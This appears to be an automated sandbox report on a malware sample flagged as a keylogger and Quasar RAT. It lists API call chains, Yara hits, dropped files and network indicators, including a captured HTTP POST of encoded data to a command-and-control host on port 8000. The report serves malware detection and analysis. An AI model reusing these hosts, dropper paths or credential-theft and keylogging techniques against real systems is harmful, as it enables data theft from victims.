Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	Avira: Label: TR/AD.MoksSteal.elw

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6A9BC CryptQueryObject,GetLastError,CryptMsgGetParam,CryptMsgGetParam,GetLastError,CertFindCertificateInStore,GetLastError,lstrcmpA,CryptDecodeObject,GetLastError,CryptDecodeObject,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,		5_2_00C6A9BC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040A610 CryptUnprotectData,LocalFree,		7_2_0040A610

Compliance:

Uses 32bit PE files

Source: CVbJSUXraQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source:	Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Spreading:

Checks for available system drives (often done to infect USB drives)

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: c:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00E1445A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,	5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,	5_2_00C76554
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,	5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00AA445A

Networking:

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49743 -> 8000

May check the online IP address of the machine

Source: C:\Users\user\AppData\Local\Temp\windef.exe	DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /_az/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 0x21.in:8000Content-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.4:49743 -> 50.17.5.224:8000
Source: global traffic	TCP traffic: 192.168.2.4:49745 -> 5.8.88.191:8080

Source: CVbJSUXraQ.exe, 00000007.00000002.943097496.0000000003320000.00000004.00000001.sdmp	String found in binary or memory: http://0x21.in:8000/_az/
Source: windef.exe	String found in binary or memory: http://api.ipify.org/
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org/3
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://freegeoip.net/xml/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com40l
Source: windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	String found in binary or memory: https://dotbit.me/a/

Source: unknown

DNS traffic detected: queries for: 0x21.in

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C6B070 socket,connect,setsockopt,send,recv,shutdown,closesocket,HeapFree,

5_2_00C6B070

Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191

Source: unknown

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Keylogger Generic

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

1_2_00DB2344

Contains functionality for read data from the clipboard

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

5_2_00C83CC0

Contains functionality to read the clipboard data

Source: C:\Windows\System32\svchost.exe

5_2_00C83A94

Potential key logger detected (key state polling based)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	1_2_00E3CABC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	7_2_00E3CABC
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00ACCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	10_2_00ACCABC

E-Banking Fraud:

Yara detected Quasar RAT

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
